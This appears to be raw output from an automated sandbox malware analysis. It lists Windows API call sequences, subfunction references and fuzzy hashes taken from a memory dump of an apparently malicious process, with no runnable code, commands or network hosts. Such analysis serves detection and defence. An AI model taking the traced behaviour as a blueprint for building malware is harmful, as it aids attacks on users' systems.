                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BA2773
                                                            • GetLastError.KERNEL32 ref: 04BA2792
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                            • String ID:
                                                            • API String ID: 2270775618-0
                                                            • Opcode ID: c24c39425fd12fcee9640172ceb2c3a5c3aec5aed1549bedfa32a536a3f78002
                                                            • Instruction ID: 054f677b28e66a402d620085c94e39d5d644c801b4f5c5a366da0596a624fab8
                                                            • Opcode Fuzzy Hash: c24c39425fd12fcee9640172ceb2c3a5c3aec5aed1549bedfa32a536a3f78002
                                                            • Instruction Fuzzy Hash: C9F0E2706843419EE3648F35E88AB193BB4E718B42F10455BA20AD62C0D7789D61CB28
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 04BBF460
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • wsprintfA.USER32 ref: 04BBF491
                                                              • Part of subcall function 04BAC12C: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BAC142
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC16A
                                                              • Part of subcall function 04BAC12C: lstrlen.KERNEL32(00000008), ref: 04BAC179
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC1B9
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC1EE
                                                              • Part of subcall function 04BAC12C: memcpy.NTDLL(00000000,?,?), ref: 04BAC1FB
                                                              • Part of subcall function 04BAC12C: memcpy.NTDLL(00000008,04BC63D8,00000002,00000000,?,?), ref: 04BAC210
                                                              • Part of subcall function 04BAC12C: wsprintfA.USER32 ref: 04BAC233
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BBF506
                                                              • Part of subcall function 04BC3EDA: RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC3EF0
                                                              • Part of subcall function 04BC3EDA: RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC3F0B
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000), ref: 04BBF4F0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BBF4FC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                            • String ID:
                                                            • API String ID: 3553201432-0
                                                            • Opcode ID: 6c4e9df576c8ab7a58c2640ef8ae6155ea683e99d4afa9c65fa64006a0401a19
                                                            • Instruction ID: d07027998f5d4c62c9bc00e04b506509b4d52d3956e944a9eec4d3d22148b10c
                                                            • Opcode Fuzzy Hash: 6c4e9df576c8ab7a58c2640ef8ae6155ea683e99d4afa9c65fa64006a0401a19
                                                            • Instruction Fuzzy Hash: FF21F67690014EEBCF11DFA5DD84CEF7BB9FB48304B004466F915A6210D675AA20DBA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                              • Part of subcall function 04BA91D3: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 04BA91EE
                                                              • Part of subcall function 04BA91D3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 04BA923C
                                                              • Part of subcall function 04BA91D3: GetProcAddress.KERNEL32(00000000,?), ref: 04BA9255
                                                              • Part of subcall function 04BA91D3: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 04BA92A6
                                                            • GetLastError.KERNEL32(?,?,?), ref: 04BA3E51
                                                            • FreeLibrary.KERNEL32(?,?,?), ref: 04BA3EB9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                            • String ID:
                                                            • API String ID: 1730969706-0
                                                            • Opcode ID: bef72d6fe64e1c80d76d39df9351c869b326830f0e2cbfc628f1c98eb674c49a
                                                            • Instruction ID: 7c99e26d5e741c8166e94d4fba7ac2180ea1f86b6daf8fba4ad416f6fd2c801d
                                                            • Opcode Fuzzy Hash: bef72d6fe64e1c80d76d39df9351c869b326830f0e2cbfc628f1c98eb674c49a
                                                            • Instruction Fuzzy Hash: 8D71D8B5E00209EFCF10DFE5C8849AEBBB9FF48305B1498A9E916E7250D735A951CF60
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                              • Part of subcall function 04BBBAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04BB4A41,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000), ref: 04BBBAED
                                                              • Part of subcall function 04BBBAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BBBB10
                                                              • Part of subcall function 04BBBAE4: memset.NTDLL ref: 04BBBB1F
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,7656D3B0,05C8B17C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B5D
                                                              • Part of subcall function 04BC0B38: StrTrimA.SHLWAPI(00000000,04BC847C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B7C
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B88
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BBE7D5
                                                            • GetCurrentThread.KERNEL32 ref: 04BBE7E8
                                                            • GetModuleHandleA.KERNEL32(00000000,04BC63D4,00000000,00000000,?,00000000,?,00000000,00000000,?), ref: 04BBE86F
                                                            • GetShellWindow.USER32 ref: 04BBE876
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1517849391-0
                                                            • Opcode ID: 9868da151c8b69c0593199b3ecd9ec6bc2d1c6271a146ad41e4bd0f3a11f6cd7
                                                            • Instruction ID: 9944a9d257e5449c49155f001ebc1e113fbf282ea7a314b80386da705fed4d13
                                                            • Opcode Fuzzy Hash: 9868da151c8b69c0593199b3ecd9ec6bc2d1c6271a146ad41e4bd0f3a11f6cd7
                                                            • Instruction Fuzzy Hash: A5514D71904705EFE710DF64C884AEBB7E9EF88714F0049AAF5C5A7161DAB0F944CBA2
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04BB4DA8
                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04BB4DBE
                                                            • memset.NTDLL ref: 04BB4E67
                                                            • memset.NTDLL ref: 04BB4E7D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$_allmul_aulldiv
                                                            • String ID:
                                                            • API String ID: 3041852380-0
                                                            • Opcode ID: f23c543fc00d9bda4f3023ab9a43b3493358020a4730df8d49afff7e9c3d3d3f
                                                            • Instruction ID: ece31f5589b7b87d5eb461436428bbf8e1b59be885828e70848e822e2ee1c41d
                                                            • Opcode Fuzzy Hash: f23c543fc00d9bda4f3023ab9a43b3493358020a4730df8d49afff7e9c3d3d3f
                                                            • Instruction Fuzzy Hash: FE41A371600219BFEB109E68DC80BFE7779EF45314F0049A9F99597181EBB0BE548BD1
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • GetCommandLineA.KERNEL32(?,00000000,00000000,?,00000000,04BB227C,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BAED76
                                                            • StrChrA.SHLWAPI(00000000,00000020,?,00000000,04BB227C,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BAED87
                                                              • Part of subcall function 04BBBAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04BB4A41,00000000,00000001,00000000,73B74D40,?,?,04BB5ADA,00000000,00000000), ref: 04BBBAED
                                                              • Part of subcall function 04BBBAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BBBB10
                                                              • Part of subcall function 04BBBAE4: memset.NTDLL ref: 04BBBB1F
                                                            • ExitProcess.KERNEL32 ref: 04BAEED5
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,7656D3B0,05C8B17C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B5D
                                                              • Part of subcall function 04BC0B38: StrTrimA.SHLWAPI(00000000,04BC847C,00000000,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B7C
                                                              • Part of subcall function 04BC0B38: StrChrA.SHLWAPI(00000000,04BB5ADA,?,04BA3CAE,04BB5ADA,00000020,05C8B17C,?,?,04BB5ADA), ref: 04BC0B88
                                                            • lstrcmp.KERNEL32(00000000,?), ref: 04BAEDF3
                                                              • Part of subcall function 04BBCC4A: FindFirstFileW.KERNEL32(?,?,?,?), ref: 04BBCCD6
                                                              • Part of subcall function 04BBCC4A: lstrlenW.KERNEL32(?), ref: 04BBCCF2
                                                              • Part of subcall function 04BBCC4A: lstrlenW.KERNEL32(?), ref: 04BBCD0A
                                                              • Part of subcall function 04BBCC4A: lstrcpyW.KERNEL32(00000000,?), ref: 04BBCD23
                                                              • Part of subcall function 04BBCC4A: lstrcpyW.KERNEL32(00000002), ref: 04BBCD38
                                                              • Part of subcall function 04BBCC4A: FindNextFileW.KERNEL32(?,00000010), ref: 04BBCD60
                                                              • Part of subcall function 04BBCC4A: FindClose.KERNEL32(00000002), ref: 04BBCD6E
                                                              • Part of subcall function 04BBCC4A: FreeLibrary.KERNEL32(?), ref: 04BBCD80
                                                              • Part of subcall function 04BB9976: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BB9999
                                                              • Part of subcall function 04BB9976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,04BAEE33,?,?,00000000,04BB227C,00000000,73BCF5B0,04BA824E), ref: 04BB99DA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Findlstrlen$FileFreeHeaplstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmpmemcpymemset
                                                            • String ID:
                                                            • API String ID: 2123058440-0
                                                            • Opcode ID: 156b9e8cda608e8a90d31bd27febda42eb9524c39c90a1e88ed17396ec60b530
                                                            • Instruction ID: 40893c7f9d865d1a105d6eb3ea15f412d6218f63d703053dcc42a33aeaa105bc
                                                            • Opcode Fuzzy Hash: 156b9e8cda608e8a90d31bd27febda42eb9524c39c90a1e88ed17396ec60b530
                                                            • Instruction Fuzzy Hash: B5416C71608301EFE750EF65D8C496FB7E9EB88214F048C6EF599D3150EA35E8188B62
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                              • Part of subcall function 04BB5CE8: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,04BA908A), ref: 04BB5CF4
                                                              • Part of subcall function 04BB5CE8: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04BB5D52
                                                              • Part of subcall function 04BB5CE8: lstrcpy.KERNEL32(00000000,00000000), ref: 04BB5D62
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 04BB8002
                                                            • wsprintfA.USER32 ref: 04BB8032
                                                            • GetLastError.KERNEL32 ref: 04BB80A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                                                            • String ID: `
                                                            • API String ID: 324226357-1850852036
                                                            • Opcode ID: 8d4f2863f20b35ffe44f8de6c2713bf6391517a13099e2748444c33fefd31ab2
                                                            • Instruction ID: f4538dbc3a5a043fb8a207e52ce5c46b1ecfacaea9b5531cd3ae15702ce9912a
                                                            • Opcode Fuzzy Hash: 8d4f2863f20b35ffe44f8de6c2713bf6391517a13099e2748444c33fefd31ab2
                                                            • Instruction Fuzzy Hash: F931BF71500709ABDB21AF65CC84AEB7BBDFF04354F50806AF95597150EBB0F9248BA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 04BBFAB7
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetLastError.KERNEL32 ref: 04BBFA2B
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04BBFA3B
                                                            • GetLastError.KERNEL32 ref: 04BBFA5B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 35602742-0
                                                            • Opcode ID: 1d2443caf0e903b2bcb6605582d9fd91d3399d555d04582f5b276f938df58ac6
                                                            • Instruction ID: e2583216860c79cc01c90d759146af2e86360ac7808f09805d2a3bcc2b7e3ced
                                                            • Opcode Fuzzy Hash: 1d2443caf0e903b2bcb6605582d9fd91d3399d555d04582f5b276f938df58ac6
                                                            • Instruction Fuzzy Hash: BA410BB0900209EFDF149FA4DC849FDBBB9FF08345B6044AAE581E7150D7B4AE41DBA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
APIs
  • Part of subcall function 04BB52CD: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 04BB52DB
• RtlAllocateHeap.NTDLL(00000000,?), ref: 04BBF7DC
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BBF82B
  • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,04BBF1B3,00000000,04BBF1B4,00000080,00000000,00000000,04BC4C6A,00000000,04BBF1B3,?), ref: 04BB537E
  • Part of subcall function 04BB533D: GetLastError.KERNEL32 ref: 04BB5388
  • Part of subcall function 04BB533D: WaitForSingleObject.KERNEL32(000000C8), ref: 04BB53AD
  • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BB53CE
  • Part of subcall function 04BB533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 04BB53F6
  • Part of subcall function 04BB533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 04BB540B
  • Part of subcall function 04BB533D: SetEndOfFile.KERNEL32(00000001), ref: 04BB5418
  • Part of subcall function 04BB533D: CloseHandle.KERNEL32(00000001), ref: 04BB5430
• HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000101,?,?,?,04BA7236,?,?,?,?,?,00000000), ref: 04BBF860
• HeapFree.KERNEL32(00000000,?,?,?,?,04BA7236,?,?,?,?,?,00000000,?,00000000,?,04BA4A91), ref: 04BBF870
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
• String ID:
• API String ID: 4200334623-0
• Opcode ID: c5e8e917a0d1201de5dc6d2ed974e297482a70678e811be5b288488d7f9aba08
• Instruction ID: 5f0e891ab6df1ee25ef304e0f741868ad507bc4e21f8b924a2eced25692b571b
• Opcode Fuzzy Hash: c5e8e917a0d1201de5dc6d2ed974e297482a70678e811be5b288488d7f9aba08
• Instruction Fuzzy Hash: 41310575900119FFEB109FA5DC89CBEBBBDEB08354B1100A6F545E7250D7B1AE50DBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BC148E
• memcpy.NTDLL(00000018,?,?), ref: 04BC14B7
• RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00019D73,00000000,000000FF,00000008), ref: 04BC14F6
• HeapFree.KERNEL32(00000000,00000000), ref: 04BC1509
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
• String ID:
• API String ID: 2780211928-0
• Opcode ID: 7f5b99a86f758f59c2bac9fc5d97993b276ac7b8be8e3d965cba81d7b33da19b
• Instruction ID: 6ba186cf179517af20e899ee2e5a2e1dfbba70bd8e921ba69a2c1274917b6676
• Opcode Fuzzy Hash: 7f5b99a86f758f59c2bac9fc5d97993b276ac7b8be8e3d965cba81d7b33da19b
• Instruction Fuzzy Hash: 6A315071200206EFDB208F29EC85E9A7BB9FB08761F10455AF916D7290D775E9118FA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• TlsGetValue.KERNEL32(?), ref: 04BA30EF
• SetEvent.KERNEL32(?), ref: 04BA3139
• TlsSetValue.KERNEL32(00000001), ref: 04BA3173
• TlsSetValue.KERNEL32(00000000), ref: 04BA318F
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: Value$Event
• String ID:
• API String ID: 3803239005-0
• Opcode ID: b372de7fe19acf816fa57b18fbc3cfce474d4ab1fea078c54dd8e8ce3d967de6
• Instruction ID: 2c823913a6b79465dd01fb407c8d0decaaa3de125537190d95d4c45e780055cb
• Opcode Fuzzy Hash: b372de7fe19acf816fa57b18fbc3cfce474d4ab1fea078c54dd8e8ce3d967de6
• Instruction Fuzzy Hash: 72217C31208204AFDB218F69DCC8A6A7BF6FB45350B10596AF91AD7260D771FC72DB60
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BC33D9: memcpy.NTDLL(00000000,00000110,04BB5AB0,04BB5AB0,?,00000000,00000001,00000000,73B74D40), ref: 04BC340F
  • Part of subcall function 04BC33D9: memset.NTDLL ref: 04BC3485
  • Part of subcall function 04BC33D9: memset.NTDLL ref: 04BC3499
• RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 04BA8ECF
• lstrcmpi.KERNEL32(00000000,?), ref: 04BA8EF6
• HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 04BA8F3B
• HeapFree.KERNEL32(00000000,?,?,?,?), ref: 04BA8F4C
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: Heap$Freememset$Allocatelstrcmpimemcpy
• String ID:
• API String ID: 1065503980-0
• Opcode ID: f1ca8b929e12872a418157ab8ab09d14408413647901e68ca5476f692ce17678
• Instruction ID: 584c4255038c9430fe7c2513ebc8e939e31f02c2aea560c90807f774bf1f7fca
• Opcode Fuzzy Hash: f1ca8b929e12872a418157ab8ab09d14408413647901e68ca5476f692ce17678
• Instruction Fuzzy Hash: 7E214871A0420AEFEF11AFA4DC84EAD7BB9EB08308F0044A6F905E7110D675FD649B60
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 04BA8D02
• lstrlen.KERNEL32(00000000), ref: 04BA8D12
  • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
• strcpy.NTDLL ref: 04BA8D29
• StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 04BA8D33
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: AllocateHeaplstrlenmemsetstrcpy
• String ID:
• API String ID: 528014985-0
• Opcode ID: a2e4eeb0c20aae41ae4e1b1a412025e8cfb53b1d37bbed52c5dc0879f6de9257
• Instruction ID: 85ad21578da770b2e15e878ce214c4b8d96b9d463b06d6e2383aba60eef9bd0c
• Opcode Fuzzy Hash: a2e4eeb0c20aae41ae4e1b1a412025e8cfb53b1d37bbed52c5dc0879f6de9257
• Instruction Fuzzy Hash: C421C271108301AFE7206F64E889B2B77F8EF58315F00845EF99687641EB78F820A761
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BC3EF0
• RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BC3F0B
• GetLastError.KERNEL32 ref: 04BC3F79
• GetLastError.KERNEL32 ref: 04BC3F88
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: CriticalErrorLastSection$EnterLeave
• String ID:
• API String ID: 2124651672-0
• Opcode ID: cd0e12e5bdb834a9b7e92ad1377cca4be18a1a316fbcf1052eb3aac7f09c1471
• Instruction ID: b8cf68f7c3a81dccb3891b102a3773097fa30eddc8b710d678626e50899b6743
• Opcode Fuzzy Hash: cd0e12e5bdb834a9b7e92ad1377cca4be18a1a316fbcf1052eb3aac7f09c1471
• Instruction Fuzzy Hash: 3221FB35901208EFCB118FA4D884A9EBBB8FF49711B11855AF815A7250D734EE11DBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 04BA881E
• lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 04BA8862
• OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 04BA88A5
• CloseHandle.KERNEL32(?,?,?,?,?), ref: 04BA88C8
  • Part of subcall function 04BADD60: GetTickCount.KERNEL32 ref: 04BADD70
  • Part of subcall function 04BADD60: CreateFileW.KERNEL32(04BA1DEA,80000000,00000003,04BCC1A8,00000003,00000000,00000000,?,04BA1DEA,?), ref: 04BADD8D
  • Part of subcall function 04BADD60: GetFileSize.KERNEL32(04BA1DEA,00000000,?,00000001,?,04BA1DEA,?), ref: 04BADDC0
  • Part of subcall function 04BADD60: CreateFileMappingA.KERNEL32(04BA1DEA,04BCC1A8,00000002,00000000,00000000,04BA1DEA), ref: 04BADDD4
  • Part of subcall function 04BADD60: lstrlen.KERNEL32(04BA1DEA,?,04BA1DEA,?), ref: 04BADDF0
  • Part of subcall function 04BADD60: lstrcpy.KERNEL32(?,04BA1DEA), ref: 04BADE00
  • Part of subcall function 04BADD60: HeapFree.KERNEL32(00000000,04BA1DEA,?,04BA1DEA,?), ref: 04BADE1B
  • Part of subcall function 04BADD60: CloseHandle.KERNEL32(04BA1DEA,?,00000001,?,04BA1DEA), ref: 04BADE2D
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
• String ID:
• API String ID: 3239194699-0
• Opcode ID: 83a3530ab671e540684a9283b6a3bf884ec97ab91573dd96be8e8c8dd6850a52
• Instruction ID: b77a6f779808917c3fd00a25e1e0ef0353b75e4be7755700f5297a31661911c3
• Opcode Fuzzy Hash: 83a3530ab671e540684a9283b6a3bf884ec97ab91573dd96be8e8c8dd6850a52
• Instruction Fuzzy Hash: 81215A31900208DBEF21EFA5DD88DEE7BB9FF88394F140166F915D2160EB30A925CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BBB54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,04BA138B,00000000,04BCC16C,00000000), ref: 04BBB572
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BA6D38
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04BBE1A6,?), ref: 04BA6D4A
• ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,04BBE1A6,?), ref: 04BA6D62
• CloseHandle.KERNEL32(?,?,?,?,?,?,04BBE1A6,?), ref: 04BA6D7D
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: File$CloseCreateHandleModuleNamePointerRead
• String ID:
• API String ID: 1352878660-0
• Opcode ID: 96b85b393da12b4bf604dffd120379a014cf75b3944c8a4aa0c33fbf3963c9d2
• Instruction ID: f9722dcd0c121d3cf22d3d689df8176b020b3eeb61f1149cb8f9a8c9f27ca565
• Opcode Fuzzy Hash: 96b85b393da12b4bf604dffd120379a014cf75b3944c8a4aa0c33fbf3963c9d2
• Instruction Fuzzy Hash: AA115EB1600118BBEF20AFA5CC89EEF7F7CEF05794F184155F554E6050D770AA50DAA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC101F
  • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04BBCD48,?,00000000,04BAEE2A), ref: 04BC1041
• lstrcpyW.KERNEL32(00000000,00000000), ref: 04BC106D
• lstrcatW.KERNEL32(00000000,?), ref: 04BC1080
  • Part of subcall function 04BB435F: strstr.NTDLL ref: 04BB4437
  • Part of subcall function 04BB435F: strstr.NTDLL ref: 04BB448A
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
• String ID:
• API String ID: 3712611166-0
• Opcode ID: 03c0758ed08a4ff28970ef4594d1cbe77910883bde78c42f852c2f1e6edee0a1
• Instruction ID: 63466a12f40016baf183cd4468a54bb9ac3761d80570a0f577b7924ca74dc64e
• Opcode Fuzzy Hash: 03c0758ed08a4ff28970ef4594d1cbe77910883bde78c42f852c2f1e6edee0a1
• Instruction Fuzzy Hash: C9113A72601219BFDB11AFA5DCC8CEF7BBCEF09255B008069F905A7111D735EE518BA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BB7E4A,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB3633
• RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB364B
• memcpy.NTDLL(00000000,?,-00000008,?,?,?,04BB7E4A,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB368F
• memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 04BB36B0
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: memcpy$AllocateHeaplstrlen
• String ID:
• API String ID: 1819133394-0
• Opcode ID: b4d3008762adba5bcb63cb0c109c7d42ba9eedccb63c8b3014ee571a143b3cef
• Instruction ID: 80eb1f1a44ae7e71a6f1649f57c9546d977ed23d964f40a8a9ecf8874f7aea97
• Opcode Fuzzy Hash: b4d3008762adba5bcb63cb0c109c7d42ba9eedccb63c8b3014ee571a143b3cef
• Instruction Fuzzy Hash: 0911CA72A04218AFD7108E6ADCC4DDEBFFADB99261B450176E905D7240E674EE14C7B0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,04BA8A86,?,?,?,?,?,?,?,?,?), ref: 04BC2004
  • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
• mbstowcs.NTDLL ref: 04BC201E
• lstrlen.KERNEL32(?,?,00000008), ref: 04BC2029
• mbstowcs.NTDLL ref: 04BC2043
  • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
  • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
  • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
  • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
  • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
  • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
  • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
  • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
